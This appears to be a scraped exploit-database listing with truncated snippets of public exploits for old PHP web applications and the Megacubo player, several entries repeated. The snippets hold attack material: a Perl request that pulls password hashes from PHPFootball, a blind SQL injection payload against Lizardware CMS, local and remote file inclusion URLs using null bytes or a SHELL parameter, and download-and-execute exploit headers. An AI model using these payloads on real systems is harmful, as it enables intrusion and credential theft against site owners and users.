PHP Photo Album 0.8b - 'preview' Local File Inclusion

START 0x01 Informations: Script : Php Photo Album 0.8 BETA Download : http://sourceforge.net/project/downloading.php?groupid=151573&usemirror=kent&filename=PHPPA.9BETA.zip&37834145 Vulnerability : Local File Inclusion Author : Osirys Contact : osirysatlivedotit Website : http://osirys.org Notes :...

fttss <= 2.0 Remote Command Execution Vulnerability

Exploit for unknown platform in category web applications =================================================== fttss /tmp/dupa; HTTP/1.x 200 OK Date: Sun, 11 Jan 2009 16:24:57 GMT Server: Apache X-Powered-By: PHP/5.2.8-pl1-gentoo Content-Length: 17...

fttss 2.0 - Remote Command Execution

:::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ "Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP" "YmmMMMM"" MMM YM Discovered by dun \ dunatstrcpy.pl fttss /tmp/dupa; HTTP/1.x 200 OK Date: Sun, 11 Jan 2009 16:24:57 GMT Server: Apache X-Powered-By: PHP/5.2.8-pl1-gentoo...

Cybershade CMS 0.2b - &#039;index.php&#039; Remote File Inclusion

!/usr/bin/perl Cybershade CMS 0.2b index.php RFI shellcmdc99 Exploit url: http://sourceforge.net/projects/cybershadecms/ Author: JosS mail: sys-projectathotmaildotcom site: http://www.hack0wn.com team: Spanish Hackers Team - SHT Hack0wn Security Project!! This was written for educational purpose...

PHPFootball 1.6 - Remote Hash Disclosure

\n"; exit; else $head .= "GET /$path/filter.php?dbtable=Accounts&dbfield=Password HTTP/1.1\r\n"; $head .= "Host: $host\r\n"; $head .= "Connection: close\r\n\r\n"; $fsock = fsockopen $host,80; fputs $fsock,$head; while !feof$fsock $cont .= fgets$fsock; fclose$fsock; if pregmatchall"/.+?/",$cont,$i...

Megacubo 5.0.7 - &#039;mega://&#039; Arbitrary File Download and Execute

Megacubo 5.0.7 download & Execute by :JJunior site: http://www.musicastop.com.br/ tested against Internet Explorer 7 and Mozilla Firefox 1.5 Windows Xp sp 3 software site: http://www.megacubo.net/tv/ download url:...

Megacubo 5.0.7 - mega: Arbitrary File Download and Execute

Megacubo 5.0.7 - mega: Arbitrary File Download and Execute Megacubo 5.0.7 download & Execute by :JJunior site: http://www.musicastop.com.br/ tested against Internet Explorer 7 and Mozilla Firefox 1.5 Windows Xp sp 3 software site: http://www.megacubo.net/tv/ download url:...

Megacubo 5.0.7 Remote File Download And Execute Exploit

Megacubo 5.0.7 download & Execute by :JJunior site: http://www.musicastop.com.br/ tested against Internet Explorer 7 and Mozilla Firefox 1.5 Windows Xp sp 3 software site: http://www.megacubo.net/tv/ download url:...

Megacubo 5.0.7 &#40;mega://&#41; remote eval&#40;&#41; injection exploit

!-- Megacubo 5.0.7 mega:// remote eval injection exploit by Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ tested against Internet Explorer 8 beta 2/xp sp 3 software site: http://www.megacubo.net/tv/ download url:...

eDContainer v2.22 (lg) Local File Inclusion Vulnerability

No description provided by source. | | | \ \ \ / / / \ / | / | / | | | | | | \ V / / \ | | | | | | | | | | | / \ | || | | | | | || || \ || // \ | | | eDContainer v2.22 lg Local File Inclusion Vulnerability Script :...

Megacubo 5.0.7 - mega: Remote eval() Injection

Megacubo 5.0.7 - mega: Remote eval Injection pwn milw0rm.com 2008-12-30...

Megacubo 5.0.7 - &#039;mega://&#039; Remote &#039;eval()&#039; Injection

pwn milw0rm.com 2008-12-30...

eDContainer 2.22 - Local File Inclusion

| | | \ \ \ / / / \ / | / | / | | | | | | \ V / / \ | | | | | | | | | | | / \ | || | | | | | || || \ || // \ | | | eDContainer v2.22 lg Local File Inclusion Vulnerability Script : http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/e/ed/edscontacts/eDContainerv222.zip...

eDNews v2 (lg) Local File Inclusion Vulnerability

No description provided by source. | | | \ \ \ / / / \ / | / | / | | | | | | \ V / / \ | | | | | | | | | | | / \ | || | | | | | || || \ || // \ | | | eDNews v2 lg Local File Inclusion Vulnerability Script :...

BLOG 1.55B (image_upload.php) Arbitrary File Upload Vulnerability

Exploit for unknown platform in category web applications ================================================================= BLOG 1.55B imageupload.php Arbitrary File Upload Vulnerability ================================================================= BLOG v1.55B Arbitrary File Upload...

Lizardware CMS &lt;= 0.6.0 Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w Lizardware CMS = 0.6.0 Blind SQL Injection Exploit by athos - stakerathotmaildotit http://sourceforge.net/projects/lizardwarecms/ use strict; use LWP::UserAgent; my $stop,$start,$hash; my $domain = shift; my $ptable = shift; my $userid = shift ...

Lizardware CMS 0.6.0 - Blind SQL Injection

!/usr/bin/perl -w Lizardware CMS post$host, user = $param, pass = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "userpassword,$uidz,1=$charz,". "benchmark230000000,char0,". "0 from $ptableusers where userid=$userid"; return $send; for1..3...

PHP Weather 2.2.2 (LFI/XSS) Multiple Remote Vulnerabilities

No description provided by source. Lfi/xss script: phpweather-2.2.2 download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&bigmirror=0 vul: /test.php line 48: requirePHPWEATHERBASEDIR . "/output/pwtext$language.php"; xpl:...

PHP Weather 2.2.2 LFI / XSS

Lfi/xss script: phpweather-2.2.2 download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&bigmirror=0 vul: /test.php line 48: requirePHPWEATHERBASEDIR . "/output/pwtext$language.php"; xpl: www.site.com/path/test.php?metar=&language=Lfi%00...

CFAGCMS Remote File Inclusion

Author : BeyazKurt - [email protected] Script : CFAGCMS Download : http://sourceforge.net/project/showfiles.php?groupid=197936 Vuln : Page themes/default/index.php, Line 15-16 : Site.Com/cfagcms/themes/default/index.php?main=SHELL Site.Com/cfagcms/themes/default/index.php?right=SHELL SHQİPTAR!...